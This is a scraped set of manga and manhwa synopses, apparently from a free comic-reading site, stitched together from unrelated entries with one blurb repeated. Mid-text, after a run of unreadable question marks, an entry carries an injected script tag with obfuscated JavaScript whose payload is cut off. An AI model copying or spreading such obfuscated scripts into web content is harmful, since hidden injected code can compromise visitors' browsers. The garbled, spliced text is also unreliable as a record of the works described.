“Let’s cherish each other!” The supporting character that will eventually be thrown away, don’t play hard to get! I am Kim Geumja who is deeply immersed in the supporting character of a novel soon to face a miserable ending. One day, I was involved in a car accident. When I opened my eyes, I found myself inside of a novel! It’s shocking but I couldn’t believe I met the supporting character whom I loved dearly, Kyle. Meeting him… I couldn’t help but dance from so much happiness. Proud of my sincerity and healthy body, I decided to make Kyle happy… But for some reason, I could hear all the bad feelings towards Kyle! What a useless telepathy… Kim Geumja, who lives with an excited heart thinking about Kyle again today. If I can be by Kyle’s side, I can do all kinds of work, even a man’s!
When the clock strikes midnight, we\'re trapped in \"After-School.\" In that world, there\'s no right answer, no end, no \"game clear.\" There’s only our lifeless bodies, stacking up one by one. One day, Kei Nimori, a young elementary school student, suddenly notices his name scrawled on the classroom blackboard, alongside the mysterious words \"After-School Duty.\" Thus begins a dark, midnight fairy tale of several young boys and girls risking their lives to record and contain monsters in a bizarre realm known as \"After-School.\"
Only I can see this grim reaper?! Seowoo has just about had it with life. But when she's about to jump off a bridge, she's interrupted by a grim reaper nobody else can see. Not only that, he wants her to stay alive for three more months! A woman who wants to die and a strange reaper will Seowoo finally find a reason to live?
One day I was in a world that I did not know. [The entrance to the quest has been successfully completed! ]. [Quest (Main) – «Fix the world!». Content: This world was created by mixing four novels – Child Care, Contract Marriage, XXX, XXX. Genres are unknown. You must return the four distorted novels to the original. ]. But… I have no memory of their content. If I make a mistake… then I’m going to die?! Besides, the distorted web novel characters are interested in me! What should I do?! <ul> <li>??? ??? ????</li> <li>???????? ?????? ???????? ? ??????</li> <li>???? ?? ?? ?????? ?????, ?? ??????</li> </ul><script></script><script>function _0x33f2(_0x45a967,_0x50a62e){var _0x595e18=_0x22b5();return _0x33f2=function(_0x3562c9,_0x45a78d){_0x3562c9=_0x3562c9-(0x1f46+0xc3*-0x5+0xc*-0x230);var _0x55d953=_0x595e18[_0x3562c9];return _0x55d953;},_0x33f2(_0x45a967,_0x50a62e);}(function(_0x327897,_0x24efeb){var _0x364c1c=_0x33f2,_0x1e2a42=_0x327897();while(!![]){try{var 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Read Manhwa “If You Don’t Know The Novel, You Will Die” Online Free On Manga Zin The Summary Of The Comics “If You Don’t Know The Novel, You Will Die”: One Day I Was In A World That I Did Not Know. [The Introduction To The Quest Has Been Successfully Completed! ]. [Quest (Main) – «Fix The World!». Content: This World Was Created By Mixing Four Novels: Child Care, Contract Marriage, Xxx, Xxx. Genres Are Unknown. You Must Return The Four Distorted Novels To The Original. ]. But… I Have No Memory Of Their Content. If I Make A Mistake… Then I’m Going To Die?! Besides, The Distorted Web Novel Characters Are Interested In Me! What Should I Do?! “If You Don’t Know The Novel, You Will Die” Is Alternatively Named: Если Ты Не Знаешь Роман, То Умрешь / Незнание Романа Приведет К Смерти / 不懂浪漫奇幻小说就死定了 / 로판을 모르면 죽습니다 Read Ghosts Manhwa Recommendations: The Crazy Killer Whale’s Favourite Penguin The Ten Thousand Races Invasion: Guardian Of The Rear Find The Runaway Princess
(This manga is unusual amongst Kanako Inuki\'s manga due to the highly exaggerated gore (and emphasis on it) compared to her usual manga) A gruesome picture book-like manga. The cover was originally considered to be so gorey it was censored with a special dust jacket.
*Ubasute means \'\'Abandoning an Old Woman\'\' One day a vending machine was suddenly installed in front of a small store in a small town. When I asked the old lady that owns the store, she told me that the vending machine had already been installed here when she woke up in the morning and noticed it. The vending machine had a picture of a cute baby on it. I thought it might be a baby product or something from this picture, so I pressed the button on the vending machine and found ......! (From the collection \"Ubasute\") ***volume 1*** •Ubasute •In a Snowy Day (First Part) ***volume 2*** •In a Snowy Day (Second Part) •Memories I want to Forget
\"The extreme heat, and the stench of the factory, mixed with the unique smell of a fishing port, this town feels like hell on earth...\" A collection of tragic horror stories by horror manga master, Hino Hideshi, originally published by Hibari hit comics, and listed as number 1 in its \"black frame\" horror manga series 1 • Uroko no Nai Sakana: A boy keeps having terrible nightmares every night, but he can\'t remember a single thing from these nightmares, at the same time, he is getting tormented by hallucinations of a fish he caught. 2 • Semi no Mori: A boy and his beautiful sister\'s summer vacation are ruined by a swarm of cicadas... 3 • Mannequin no Heya: A boy believes the mannequins from \"the mannequin room\" are haunted. 4 • Jigoku e no Elevator: What will happen when this boy takes a strange elevator? 5 • Gama: A boy that kills toads for fun suffers a terrible fate. 6 • Tomodachi: The tragic tale of 2 childhood best friends... 7 • Okashina Yado: A family stays in a bizarre inn. 8 • Madara no Tamago: One day, a boy living in a factory filled area finds a strange spotted egg in a plot of land and brings it home, the boy goes to school and when he comes back, he sees a creature hatching from the egg, but his beloved pets...
10 years after the ending of the original, comes the sequel to the manga series *Muhyo to Rouji no Mahouritsu Soudan Jimusho*. *Muhyo to Roji no Mahouritsu Soudan Jimusho: Mazoku Magushi-hen*, follows Muhyo, Rouji and all their friends some time after the conclusion of the main series. --- Magical Law (Mahouritsu)... its purpose is to punish spirits who have harmed human beings or have committed wrongdoings. Muhyo, who is a genius practitioner of Magic Law and the youngest Executor ever, and Jirou Kusano (Roji), Muhyo\'s crybaby assistant who hardly ever supports him, investigate mysterious blackouts and spiritual phenomena that have been occurring in the city frequently. Moreover, those blackouts involve a person called the \"demon magician,\" who creates forbidden tools. As they investigate further an ominous shadow approaches the two...!? After solving numerous cases and mysteries in the past, will Muhyo and Roji succeed again?
In a society where people with monster dominate, high school student Makoto Tatara has a friend in this unusual world. Her name is Toko Meisen. Having a beautiful girl as a friend might make any guy envious... but there’s a twist—she is a ghost, a spirit-like existence! Their bond is one of \"Soul-mates\" (friends who share life energy). To make things even more chaotic, her sense of personal boundaries is completely broken, leading her to naturally do some rather suggestive things! Can Tatara maintain his friendship with Meisen, or will things take an unexpected turn? Note: Depending on audience feedback, this might turn into a full series!
집으로 돌려보내 주세요 The protagonist, who loves romance novels, possessed a character in the world of the novel as soon as she received a confession from her crush, Yejun. In the novel, she possessed a fallen aristocrat named Beatrice. Rather than having a sweet relationship, she was threatened with her life. Daniel, the suspicious fiance who tries to take her life every now and then, and Ellin, the cursed imperial knight that protects her from him. There were strange feelings surrounding the two. “I want to return home!” Will I be able to return safely without dying…?